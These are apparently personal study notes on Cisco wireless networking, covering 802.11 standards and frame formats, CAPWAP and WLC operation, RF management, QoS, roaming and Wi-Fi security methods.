- Ad-hoc Wi-Fi
- Infrastructure Wi-Fi
- IEEE 802.11
- RF control
- Power
- QoS
- Roaming
- Security
- Design
- Hyperlocation
Ad-hoc Wi-Fi
- P2P, half-duplex
- does not require infrastructure
- basic service set (BSS), independent BSS (IBSS)
- 802.15 – wireless PAN: Bluetooth, ZigBee
Infrastructure Wi-Fi
- access points (APs) announce service set ID (SSID)
- basic service area (BSA), distribution system (DS)
- extended service set (ESS): single SSID on different APs using different channels
Lightweight AP
- real-time functions: RF Tx/Rx, MAC mgmt, encryption
- modes
- local:
- default
- data + monitor
- monitor:
- scan channels and collect statistics
- sniffer
- rogue detection
- wired only
- detect rogue APs
- no valid MAC code in frames
- MAC is unique in RF
- bridge
- AP mesh
- SE connect
- analyze frequencies
- office extend AP (OEAP)
- SSID for VPN to HQ (tunnel) + guest WLANs (straight to Internet)
- hybrid remote edge AP (H-REAP)
- AP can perform authC, switching locally
- local:
FlexConnect AP
- modes
- connected: connection with WLC available
- forwarding through WLC
- local switching is possible: default gateway must be in DS
- standalone mode: no connection with WLC
- become standalone AP
- connected: connection with WLC available
- preserves connectivity to local resources during WLC failure
- per VLAN
WLC
- single point of management for APs
- bridge between IEEE 802.11 and Ethernet
- AP selection: signal strength
- AP power adjustment: compensate for failed AP
- authC + authZ policies
- QoS
- Roaming
- Power mgmt
- RF mgmt
WLC discovery
- AP bcasts CAPWAP Discovery in LAN (IPv4 and IPv6)
- AP sends mcast CAPWAP Discovery to ff01::18c
- local WLC addresses (I, II, III)
- DHCP
- option 43: list of WLC IPv4 addresses
- option 52: list of WLC IPv6 addresses
- DNS:
- by name CISCO-CAPWAP-CONTROLLER.localdomain
- .localdomain – form DHCP
- reset → step 1
(config)# ip forward-protocol udp 5246
(config-if)# ip helper-address <WLC_MGMT_IP>
WLC selection
- process
- primed WLC: I → II → III
- master WLC: configured as master
- least-loaded: lower ratio of joined AP/AP capacity (20/100 is better than 20/25)
- WLC may reject AP onboarding
- AP is assigned priority
- 4 levels
- WLC drops APs with lower priority to onboard AP with higher priority
- keepalive
- 30s default
- if keepalive not responded – send 4 keepalives with interval of 3s
- WLC verifies AP firmware and updates it if necessary
- firmware update requires reboot
- firmware can be uploaded in advance without reload
Mobility Express
- AireOS
- IOS XE – embedded wireless controller (EWC), Catalyst 9100
- WLC functions on AP: separate firmware image
- starting from 802.11ac wave 2 APs
Control and provisioning of wireless AP (CAPWAP)
- channels:
- data:
- UDP 5247
- no encryption by default, can be protected with DTLS
- control
- UDP 5246
- authentication + encryption: datagram TLS (DTLS)
- data:
- messages:
- CAPWAP discovery: AP searches for WLC
- CAPWAP discovery response
IEEE 802.11
- CSMA/CA: RTS, CTS, Ack receiving frame
- network allocator vector (NAV): time to send frame, others are waiting (frame + ack)
- distributed coordination function (DCF)
- random delay after NAV before RTS
- backoff timer, exponential (increases 2 times)
- interframe space (IFS)
- short IFS (SIFS): time to send ack
- reduced IFS (RIFS): time between data frame during burst (802.11n)
- extended IFS (EIFS): time to backoff after collision before retransmit
- DCF IFS (DIFS): time between common frames, SIFS + 2×slot_time
- DIFS → random backoff + listen → send if clear
Frame format
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Frame control | Duration/ID |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Address 1 |
+ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| | |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ +
| Address 2 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Address 3 |
+ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| | Sequence control |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Address 4 |
+ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| | \
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ /
\ Data (0-2304 byes) \
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| FCS |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Duration/ID: µs, time allocated for sending: frame + ack + interframe gap
Frame control
1 2 3 4 5 6 7 8
+-------+-------+-------+-------+-------+-------+-------+-------+
| Proto Version | Type | Subtype |
+-------+-------+-------+-------+-------+-------+-------+-------+
| To DS |From DS|More fr| Retry |PWR MGT|More dt| WEP | Order |
+-------+-------+-------+-------+-------+-------+-------+-------+
Clear To DS and From DS: ad-hoc or control frames
Set To DS and From DS: repeaters (AP-to-AP)
More fr: more fragments
PWR MGT:
- 0 ≡ station awake
- 1 ≡ station → sleep
More dt: more data, power save mode, 1 ≡ AP has more frames available
WEP: 1 ≡ encrypted
Order: 1 ≡ frame order must be preserved
Type:
- 00: management
- advertise: BSS, capabilities
- client management: join, leave
- subtypes
- 0000: association request
- association ID (AID)
- 0001: association response
- association ID (AID)
- 0010: reassociation request
- roaming between BSS
- 0011: reassociation response
- 0100: probe request
- active scanning: request beacon
- 0101: probe response
- 0111: reserved
- 1000: beacon
- data rates: necessary and allowed
- SSID
- ~ 100 ms interval
- 1010: disassociation
- does not reset authenticated status
- 1011: authentication
- Open, WEP
- not an actual authC
- 1100: deauthentication
- Open, WEP
- not an actual authC
- 1110: action
- extended management
- 0000: association request
- 01: control
- facilitate data transmission
- no payload, header only
- subtypes
- 0100: beamforming report poll
- 0101: VHT/HE NDP Announcement
- 0110: control frame extension
- 0111: control wrapper
- 1000: block ACK request
- 1001: block ACK
- 1010: PS-Poll
- station in Power Save mode requests frames from AP
- 1011: RTS
- 1100: CTS
- 1101: ACK
- acknowledge receiving unicast frame (data, management)
- 1110: CF-End
- 1111: CF-End + CF-ACK
- 10: data
- subtypes
- 0000: data
- 0001: data + CF-ACK
- 0010: data + CF-Poll
- 0011: data + CF-ACK + CF-Poll
- 0100: NULL (no data)
- 0101: CF-ACK (no data)
- 0110: CF-Poll (no data)
- 0111: CF-ACK + CF-Poll (no data)
- 1000: QoS data
- 1001: QoS data + CF-ACK
- 1010: QoS data + CF-Poll
- 1011: QoS data + CF-ACK + CF-Poll
- 1100: QoS NULL (no data)
- 1101: reserved
- 1110: QoS CF-Poll (no data)
- 1111: QoS CF-ACK + CF-Poll (no data)
- subtypes
Addressing
- RA – receiver address
- TA – transmitter address
- DA/SA – 802.3 address
- BSSID – AP MAC
To DS | From DS | Address 1 | Address 2 | Address 3 | Address 4 | |
---|---|---|---|---|---|---|
Management, control | 0 | 0 | RA | TA | BSSID | – |
DS → station | 0 | 1 | RA | BSSID | SA/BSSID | – |
station → DS | 1 | 0 | BSSID | TA | DA/BSSID | – |
wireless bridge, mesh | 1 | 1 | RA | TA | DA/BSSID | SA/BSSID |
802.11-1997
- FHSS: 1 Mbps, 2 Mbps
- DSSS: DBPSK (1 Mbps), DQPSK (2 Mbps)
- 2.4 GHz
802.11b
- 2.4 GHz
- DSSS: DQPSK + CCK (5.5 Mbps, 11 Mbps)
802.11a
- 5 GHz
- OFDM: BPSK, QPSK, QAM (up to 54 Mbps)
802.11g
- 2.4 GHz
- OFDM: BPSK, QPSK, QAM (up to 54 Mbps)
- backwards-compatible with 802.11b
- introduces RTS/CTS to avoid collisions (802.11b does understand 802.11g transmission)
802.11n
- 2.4 GHz, 5 GHz
- BPSK, QPSK, QAM (up to 600 Mbps)
- backwards-compatible with 802.11g and 802.11a
- high throughput (HT)
- MIMO
- several Tx and Rx
- 2×3 ≡ 2 Tx + 3 Rx
- channel aggregation
- increase number of data subcarriers to 52: guard subcarriers between channels are used for data
- can utilize adjacent channels together ≡ 40 MHz: 114 data + pilot, 14 guard
- spatial multiplexing
- distribute data stream across antennae: different radio chains
- 3×3:2 ≡ 3 Tx + 3 Rx + 2 spatial streams
- MAC efficiency
- sends several payloads (MSDU) after single header: A-MSDU
- on top of MAC layer
- software
- sends several payloads (MPDU) at once
- divided by A-MPDU delimeter
- bottom of MAC layer
- hardware
- block ack: can acknowledge several frames in addition to ack per frame
- guard interval: 800 ns, defense against intersymbol interference (ISI)
- sends several payloads (MSDU) after single header: A-MSDU
- TxBF
- transmit beamforming
- adjusts phase to form beam
- MRC
- maximal-ratio combining
- use several signal copies for determine initial signal: sensitivity improvement
- receives copies through different radio chains
- MIMO
802.11ac
- Wi-Fi 5
- 5GHz
- BPSK, QPSK, QAM
- up to 6.93 Gbps
- wave 1: up to 1.3 Gbps
- wave 2: up to 2.6 Gbps
- backwards-compatible with 802.11n
- channel aggregation
- channels of 80 MHz (wave 1) and 160 MHz (wave 2)
- 20 MHz channel uses 52 data subcarriers, 4 pilot subcarriers
- channels can adjust width dynamically: channels may overlap
- claim channel using RTS/CTS
- aggregated channels do not have to be adjacent
- dense modulation
- QAM 256
- optional in wave 1
- MAC efficiency
- MAC service data unit (MSDU) ≡ payload, ≤ 2304 bytes
- PLCP service data unit (PSDU) ≡ 802.11 header + payload + 802.11 trailer
- all frames are aggregated (PSDU) by default
- air time (MTU alternative) = 5.5 µs ⇒ 4.5 MB max
- PHY conveys number of symbols instead of bytes in packet
- MPDU contains duration instead of length
- MPDU length is contained in A-MPDU delimeter
- MSDU aggregated into A-MSDU → A-MSDU ≡ MPDU aggregated into A-MPDU
- explicit TxBF
- NULL data packet (NDP) – the only method of beamforming
- uses client feedback in response to NDP Announcement
- scalable MIMO
- up to 8 spatial streams
- wave 1: 3 spatial streams
- wave 2: 4 spatial streams
- multi-user MIMO (MU-MIMO)
- downlink
- wave 2
802.11ax
- Wi-Fi 6
- 2.4 GHz, 5 GHz
- up to 10 Gbps
- backwards-compatible with 802.11ac
- uplink MU-MIMO
- OFDMA: FDM + TDM (OFDM has only TDM ≡ all channel for single user)
- signals on mgmt rate who can transmit
- old clients wait NAV
- new clients receive frequency via trigger frame and simultaneously transmit data + ack
- signals on mgmt rate who can transmit
- QAM-1024
- 8 spatial streams
- reduce guard symbol
- symbol duration – 12.8 µs (was 3.2 µs)
- BSS coloring: adjacent BSS add color to preamble
- distinguish between RSSI from different BSS
- adjust own signal level to necessary BSS (1 channel): less noise
- subcarriers are denser
- target wait time (TWT)
- multiple BSSID: several BSSID in a single beacon in lieu of beacon per BSSID
RF control
Request to send (RTS) / clear to send (CTS)
- DSSS, low speed
- RTS/CTS threshold
- kilobytes
- if frame is smaller than threshold and media is clear – can send immediately
- without CTS: send RTS and then immediately frame, do not wait for CTS ≡ reserve BW
- CTS-self: send CTS to itself ⇒ other stations start backoff timer ≡ reserve BW
- CTS and Ack do not have source MAC (MAC AP is implied)
- RTS destination MAC = MAC AP
Frequency hopping spread spectrum (FHSS)
- deprecated for Wi-FI
- 79 channels (1 MHz wide)
- Rx and Tx must synchronize on timing and algorithm
- signal periodically hops to other channels: avoid noise from interference
- limitation:
- narrow channels → 2 Mbps max
- does not exclude interference, especially with numerous Tx
Direct sequence spread spectrum (DSSS)
- 14 channels (2.4GHz)
- each 22 MHz wide
- non-overlapping channels: 1, 6, 11
- components
- scrambler:
- data sequence gains pseudorandomness: no long sequences of 0 or 1
- coder:
- transforms single data bit into symbol (several bits)
- symbol consists of chips (1 bit)
- Barker code: narrow correlation for long sequence
- complementary code keying (CCK)
- interleaver:
- divides stream into blocks: interference peak does not affect other blocks
- modulator
- scrambler:
- chipping rate:
- 11 MHz
- sequential bit transmission
- const
- rates:
- 1 Mbps
- 11-bit Barker codes
- differential binary phase shift keying (DBPSK): 180° phase shift, per chip
- 2 Mbps
- 11-bit Barker code
- differential quadrature phase shilf keying (DQPSK): 90° phase shift, per 2 chips
- 5.5 Mbps
- CCK: 4 bit → 6 bit + 2 bit per phase = 8 bit
- DQPSK
- 11 MHz / 8 = 1.375 MHz – symbol generation, each symbol has 4 data bits → 5.5 Mbps
- 11 Mbps
- CCK: 8 bit → 8 bit
- DQPSK
- 1 Mbps
Orthogonal frequency division multiplexing (OFDM)
- 20 MHz channels
- each has 64 subchannels – subcarriers
- guard
- 12 subchannels
- channel separation
- allow Rx to lock on channel
- pilot
- 4 subchannels
- on equal distance apart
- always transmit – estimate noise in channel
- data
- 48 subchannels
- guard
- subchannels are separated by 312.5 kHz
- subcarriers overlap, but tails cancel each other: intercarrier interference (ICI) = 0
- subchannel speed – 250 kbps with BPSK
- each has 64 subchannels – subcarriers
- bits are sent in parallel on different subcarriers
- coder: repeats old bits
- BPSK 1/2: half of bits are new, other half is old bits
- BPSK 3/4: 75% new bits, 25% old bits
- modulation:
- BPSK
- 1/2: 6 Mbps
- 3/4: 9 Mbps
- QPSK
- 1/2: 12 Mbps
- 3/4: 18 Mbps
- 16-QAM
- 1/2: 24 Mbps
- 3/4: 36 Mbps
- 64-QAM
- 2/3: 48 Mbps
- 3/4: 54 Mbps
- 256-QAM
- 3/4: 78 Mbps
- 5/6: 86 Mbps
- BPSK
Spectrum
Industry, scientific, medical (ISM)
- allocated by ITU-R
- 2.4-2.5 GHz
- max Tx: 30 dBm
- max EIRP: 36 dBm (20 dBm in Europe)
- 5.725-5.825 GHz (23 non-overlapping channels)
- unlicensed frequencies
Unlicensed national information infrastructure (U-NII)
- allocated by Federal Communications Commission (FCC)
- U-NII-1:
- 5.15-5.25 GHz: channels 32, 36, 40, 44, 48
- indoor
- max Tx
- 17 dBm (50 mW) in US
- 23 dBm in EU
- max EIRP: 23 dBm
- U-NII-2:
- 5.25-5.35 GHz: channels 52, 56, 60, 64, 68
- indoor/outdoor in US, indoor in EU
- max Tx
- 24 dBm (250 mW) in US
- 23 dBm in EU
- max EIRP: 30 dBm
- U-NII-2 Extended:
- 5.470-5.725 GHz: channels 96, … , 140
- indoor/outdoor
- max Tx
- 24 dBm (250 mW) in US
- 30 dBm in EU
- max EIRP: 30 dBm
- U-NII-3:
- 5.725-5.825 GHz: channels 149, … , 165
- indoor/outdoor in US, licensed in EU
- max Tx: 30 dBm (1 W)
- max EIRP: 36 dBm
- channel width: 20 MHz
- channel 0 ≡ 5 GHz, 802.11 channel width = 5 MHz ⇒ channel 36 on 5.180 GHz
Dynamic frequency selection (DFS)
- release frequency, if military/weather radar is detected
Radio resource management (RRM)
- calculates optimal RF parameters for APs in RF group (once per 600s by default)
- RF group
- by default all APs from same WLC are in the same RF group
- different WLCs
- requirements
- RF group has the same name on WLCs
- APs from WLC1 can hear at least one AP from WLC2 (RSSI ≥ -80 dBm)
- every 60s APs send neighbour discovery packet (NDP) at max transmission power
- WLC leader
- elected per group
- collects and processes data
- requirements
- transmit power control (TPC)
- APs create list of adjacent APs and their RSSI, send the list to leader
- overlap condition: AP signal RSSI exceeds threshold on 3+ neighbours
- threshold = -70 dBm by default
- action on overlap: decrease RSSI by 3 dBm
- 8 levels: 1 ≡ 23 dBm, 8 ≡ 2 dBm
- new APs initially transmit at max power
- dynamic channel allocation (DCA)
- new APs initially use channel 1 (2.4 GHz) or channel 36 (5 GHz)
- convergence time: 100 min
- metrics:
- RSSI AP: always on
- 802.11 interference: enabled by default
- non-802.11 noise: enabled by default
- AP traffic load
- disabled by default
- if AP is under heavy load, WLC may prefer not to change channel
- persistent interference
- disabled by default
- avoid channels that have transmitter with long pulse and short pause
- coverage hole detection mitigation (CHDM)
- triggered by RF change, not by timer
- coverage hole:
- client RSSI ≤ -80 dBm
- low RSSI for at least 60s out of latest 180s
- at least 3 clients on WLC or 25% on AP are affected
- event-driven RRM (ED-RRM)
CleanAir
- detects interference source, its nature and location
- UADP ASIC
Power
- effective isotropic radiated power (EIRP): max energy in signal
- maximums
- Tx: 30 dBm
- EIRP: 36 dBm
- P2M links
- rule 1-1: 1 dBm on Tx ≡ 1 dBi for antenna
- P2P links
- rule 3-1: 1 dBm on Tx ≡ 3 dBi for antenna
- EIRP does not exceed 56 dBm
Power save
- client disconnects radio for a short time
- while client is sleeping, AP buffers frames to the client
- beacon contains traffic indicator map (TIM): list of AIDs that have the data available for them
- if client sees itself in TIM, it sends PS-Poll the request a frame
- delivery TIM (DTIM):
- sent once in a long time, transmission period in beacon ⇒ clients do not miss it
- informs about bcast/mcast data ⇒ wakes the clients to receive the data
- disadvantage – AP manages power saving on client
Unscheduled automatic power save delivery (U-APSD)
- power save improvement:
- client-centric
- part of 802.11e wi-Fi Multimedia (WMM)
- AP buffers data in each queue, sends data as a whole on request (not per frame)
- client requests specific queue from AP
- 4 categories: QoS section
Target wait time (TWT)
- 802.11ax
- AP tells STA:
- how long STA can sleep
- how long STA should wait for AP after wake
- part of mgmt frame
QoS
- CoS and UP are calculated based on 3 MSB of DSCP, exceptions
- platinum
- CS6: UP = 7, CoS = 6, DSCP = 48
- EF: UP = 6, CoS = 5, CoS = 46
- gold
- AF41: UP = 5, CoS = 4, DSCP = 34
- AF31: UP = 4, CoS = 3, DSCP = 26
- silver
- AF21: UP = 3, CoS = 2, DSCP = 18
- BE: UP = 0, CoS = 0
- bronze
- AF11: UP = 2, CoS = 1, DSCP = 10
- platinum
- upstream marking
- preserves inner DSCP
- CAPWAP DSCP – based on UP
- if client does not support WMM – default class for SSID
- CoS – based on inner DSCP
- if UP exceeds maximum permitted value for the class – reduce CAPWAP DSCP to max permitted value
- UP = 4 → AF31 ≠ CS3 (voice control) ⇒ remap AF31 to CS3 on first-hop switch
- downstream marking
- preserves inner DSCP
- inner DSCP → CAPWAP DSCP
- CAPWAP DSCP → UP
- if inner DSCP exceeds maximum permitted value for the class – reduce CAPWAP DSCP to max permitted value
- in order to match DSCP and UP, last-hop switch must remap DSCP CAPWAP from CS3 tp DSCP 33 (falls under gold)
- default DSCP
- WLC classes
- platinum: EF (46)
- gold: AF41 (34)
- silver: DF (0)
- bronze: AF11 (10)
- does not match common markings ≡ breaks wired QoS (e.g., voice signalling)
- WLC classes
Enhanced distributed channel access (EDCA)
- 802.11e, Wi-Fi Multimedia (WMM)
- improvement of DCF: increases probability to be served first for high-priority traffic
- reduces contention window (CW) for AC (default – 15 ≤ CW < 1023)
- user priority (UP): ≈ CoS, 3 bits
- voice marking mismatch: UP = 6 and CoS = 5 (3 in RFC)
- arbitration interframe spacing number (AIFSN)
- reduces DIFS for priority traffic ≡ increases probability for it to be served first
- transmission opportunity (TXOP)
- limit transmission time after reserving the medium (NAV – just a single frame)
- 0 ≡ only one frame can be transmitted
- access categories (AC)
- AC_VO
- voice
- WLC: platinum
- UP = 7, 6
- AIFSN = 2 slot
- 3 ≤ CW < 7
- AC_VI
- video
- WLC: gold
- UP = 5, 4
- AIFSN = 2 slot
- 7 ≤ CW < 15
- AC_BE
- best effort
- WLC: silver
- UP = 3, 0
- AIFSN = 3 slot
- TXOP = 0
- AC_BK
- background
- WLC: bronze
- UP = 2, 1
- AIFSN = 7 slot
- TXOP = 0
- AC_VO
- transmission specification (Tspec)
- call admission control: does not allow new flows in AC if there is no room ⇒ protect existing flows in AC
- optional for implementation in WMM
- radio interface level, not SSID
Low latency MAC
- drop real-time packets that remain in the queue for too long (client will discard them anyway)
- WMM and proper DSCP marking are required
SIP snooping
- media session snooping and reporting
- application may not set correct UP – need to look into SIP (UDP 5060) and determine RTP ports
- platinum or gold QoS profile is required
- puts voice into UP = 6 regardless DSCP value – processed in Voice AC
Application visibility and control (AVC)
- can change inner DSCP: applied before QoS and CAPWAP encapsulation
- processed on WLC, not AP
Catalyst 3850
- trusts QoS by default, except for wired-wireless bridging (rewrites to 0)
; trust DSCP between wired and wireless
(config)# no qos wireless-default-untrust
Roaming
AP level
- when client switches between APs, it does not know which channel to use ⇒ active/passive scan on all channels
- assisted roaming
- 802.11k
- client requests from AP the list of adjacent APs: no scanning
- layout:
- adjacent BSS must be on different channels: less interference
- adjacent BSS must overlap, ≈ 20%
- cell edge = -67 dBm
Fast roaming
- 802.11r
- handshake with target AP and key generation – done in advance
- pairwise transient key (PTK)
- types
- over-the-air: negotiate with AP directly
- over-the-DS
WLC level
- OSI L2
- WLC within same VLAN
- client retains IP, remains in the same VLAN
- fast: ≈ 20 ms
- not scalable: VLAN has to be stretched
- OSI L3
- client changes VLAN when switching to another AP
- WLCs build CAPWAP tunnels between each other
- IP97 for EoIP
- UDP 16666 for control traffic
- for traffic, returning back to client
- anchor controller: original controller, point of presence (PoP)
- foreign controller: new controller, point of attachment (PoA)
- traffic modes
- all through anchor controller
- single point of policy enforcement (e.g., guest WLAN)
- egress: AP → foreign → anchor → server
- ingress: server → anchor → foreign → AP
- local handoff at foreign controller
- asymmetric: FW issues
- egress: AP → foreign → server
- ingress: server → anchor → foreign → AP
- all through anchor controller
- WLC functions
- mobility agent (MA)
- interaction with clients
- CAPWAP tunnels
- client DB
- security
- QoS
- mobility controller (MC)
- high-level mgmt
- roaming
- radio resource mgmt (RRM)
- wireless IPS
- guest access
- mobility agent (MA)
- wireless controller module (WCM): MA, can be MC as well
- mobility anchor: static anchor for guest WLAN
- static IP tunnelling: WLC communicate and tunnel traffic from static IP
- WLC upstream interface – L2 port-channel (no routing capabilities)
- WLC hierarchy
- mobility group
- WLC group (MC and MA)
- roaming between WLCs is permitted (list of MAC addresses)
- switch peer group (SPG)
- when MA connect to WLC, MA form CAPWAP full-mesh between themselves
- faster roaming
- mobility subdomain
- MA group, connected to same MC
- mobility domain
- all groups within enterprise
- mobility group
Security
- authC methods
- Open
- WEP
- RC4
- weakness: no key rotation, short IV, no MAC
- 802.1x/EAP
- lightweight EAP (LEAP)
- frequent change of WEP keys
- RADIUS
- EAP flexible authC by secure tunnelling (EAP-FAST)
- tunnel setup for authC with keys
- RADIUS
- supports PAC
- protected EAP (PEAP)
- ≈ EAP-FAST with certificates
- client authC: MS-CHAPv2, generic token card (GTC)
- EAP-TLS
- ≈ PEAP
- client authC with certificate
- lightweight EAP (LEAP)
- privacy methods
- Temporal Key Integrity Protocol (TKIP)
- 802.11i
- message integrity check (MIC): timestamp, src MAC, counter, long IV (48 bits)
- 128-bit WEP key per frame
- CBC-MAC protocol (CCMP)
- AES + CBC-MAC
- Temporal Key Integrity Protocol (TKIP)
Wi-Fi Protected Access (WPA)
- Wi-Fi Alliance certificates
- WPA: pre-standard (parts of 802.11i, 802.1x, TKIP)
- WPA2: 802.11i + CCMP (no TKIP)
- authC
- personal: PSK
- enterprise: 802.1x
- per client keys
Management frame protection (MFP)
- client requirements: WPA2 and CCXv5 (Cisco Compatible Extensions)
- infrastructure
- AP appends MIC
- if MIC does not match, AP notifies WLC
- client
- MIC
- encryption between client and AP
802.11w
- protected management frames (PMF)
- uses security associations (SA)
- protection of disassociation, deauthentication
- bcast/mcast integrity protocol (BIP)
- WPA2 is mandatory
- does not replace MFP: does not protect against beacons, generated from rogue AP
Client exclusion
- deny client service for 60s by default
- reasons
- too many 802.11 association failure
- too many 802.11 authentication failure
- too many 802.1x authentication failure
- IP theft, IP reuse
- too many WebAuth failures
Design
- signal strength
- max: -30 dBm
- normal: -40 dBm
- min for real-time: -67 dBm
- min: -80 dBm
- SNR
- min: 10 dBm
- min for real-time: 25 dBm
- roaming takes less than 15 ms
Real-time traffic
- allocate own SSID: admission control
- disable slow data rate: less jitter because of old clients
High density
- use high minimum data rate ≡ reduce cell size for the client, utilizing SNR
- lower channel width ≡ lower co-channel interference
- air time – limited resource ⇒ client onboarding ASAP (even at the cost of roaming)
- 50 users per AP interface
Wi-Fi mesh
- throughput is halved for each additional hop
Hyperlocation
- uses angle of attack (AoA) on AP besides triangulation
- precision: 1-3m (triangulation: 5-10m)
- uses separate antenna array
- DNA Spaces is required
- manual placement of APs on map